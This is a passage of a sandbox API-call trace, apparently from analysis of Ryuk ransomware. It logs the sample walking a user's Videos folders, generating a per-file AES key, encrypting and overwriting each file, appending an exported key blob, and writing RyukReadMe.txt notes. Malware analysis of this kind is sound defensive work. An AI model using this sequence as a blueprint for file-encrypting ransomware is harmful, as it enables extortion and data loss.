lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.253] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.254] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.254] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.254] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.254] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.254] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x28cc, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x28cc, lpOverlapped=0x0) returned 1 [0159.254] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.254] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x28cc, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x28d0) returned 1 [0159.254] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.254] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x28d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x28d0, lpOverlapped=0x0) returned 1 [0159.255] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.255] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.255] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.255] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.255] CloseHandle (hObject=0xd4) returned 1 [0159.272] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.276] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.276] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.276] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.276] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.277] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\Q5Hbtb.mp4", dwFileAttributes=0x80) returned 1 [0159.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\Q5Hbtb.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\wj4qlm\\q5hbtb.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.277] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=73627) returned 1 [0159.277] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=73627) returned 1 [0159.277] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x11e79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.277] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.278] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.278] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.278] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.278] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.278] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x11f9b, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x11f9b, lpOverlapped=0x0) returned 1 [0159.279] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.279] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x11f9b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x11fa0) returned 1 [0159.280] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.280] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11fa0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x11fa0, lpOverlapped=0x0) returned 1 [0159.280] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.280] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.280] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.280] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.280] CloseHandle (hObject=0xd4) returned 1 [0159.304] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.308] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.308] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.308] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.308] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.309] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\qKr.avi", dwFileAttributes=0x80) returned 1 [0159.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\qKr.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\wj4qlm\\qkr.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.309] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=29822) returned 1 [0159.309] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=29822) returned 1 [0159.309] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x735c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.309] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.310] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.310] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.310] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.310] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.310] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x747e, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x747e, lpOverlapped=0x0) returned 1 [0159.311] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.311] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x747e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x7480) returned 1 [0159.311] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.311] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7480, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x7480, lpOverlapped=0x0) returned 1 [0159.311] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.311] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.311] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.311] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.311] CloseHandle (hObject=0xd4) returned 1 [0159.326] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.331] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.331] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.331] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.331] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.331] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\z7qQ5rif5K.mp4", dwFileAttributes=0x80) returned 1 [0159.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\z7qQ5rif5K.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\wj4qlm\\z7qq5rif5k.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0159.332] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=45051) returned 1 [0159.332] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=45051) returned 1 [0159.332] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xaed9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.332] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0159.333] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.333] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0159.333] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.333] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.333] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xaffb, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xaffb, lpOverlapped=0x0) returned 1 [0159.334] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0159.334] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xaffb, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xb000) returned 1 [0159.334] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.334] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb000, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xb000, lpOverlapped=0x0) returned 1 [0159.334] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0159.334] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.334] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0159.334] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0159.334] CloseHandle (hObject=0xd4) returned 1 [0159.349] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.353] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.353] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.354] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.354] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.354] SetLastError (dwErrCode=0x0) [0159.354] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\wJ4qlm\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\wj4qlm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.354] GetLastError () returned 0x0 [0159.354] WriteFile (in: hFile=0xe4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0159.355] CloseHandle (hObject=0xe4) returned 1 [0159.355] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.355] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.355] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\x6my.avi", dwFileAttributes=0x80) returned 1 [0159.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\x6my.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\x6my.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.356] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=43198) returned 1 [0159.356] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=43198) returned 1 [0159.356] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0xa79c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.356] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0159.356] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.356] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0159.356] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.356] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.357] ReadFile (in: hFile=0xe4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa8be, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xa8be, lpOverlapped=0x0) returned 1 [0159.357] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0159.357] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xa8be, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xa8c0) returned 1 [0159.357] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.357] WriteFile (in: hFile=0xe4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa8c0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xa8c0, lpOverlapped=0x0) returned 1 [0159.358] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0159.358] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0159.358] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0159.358] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0159.358] CloseHandle (hObject=0xe4) returned 1 [0159.373] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.380] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.380] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.380] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.380] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.380] SetLastError (dwErrCode=0x0) [0159.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0159.381] GetLastError () returned 0xb7 [0159.381] CloseHandle (hObject=0x190) returned 1 [0159.381] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.381] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.381] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\xU_3n-aPf1GN.avi", dwFileAttributes=0x80) returned 1 [0159.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\xU_3n-aPf1GN.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\xu_3n-apf1gn.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0159.381] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=83627) returned 1 [0159.381] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=83627) returned 1 [0159.381] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x14589, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.381] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0159.382] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.382] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0159.382] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.382] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, 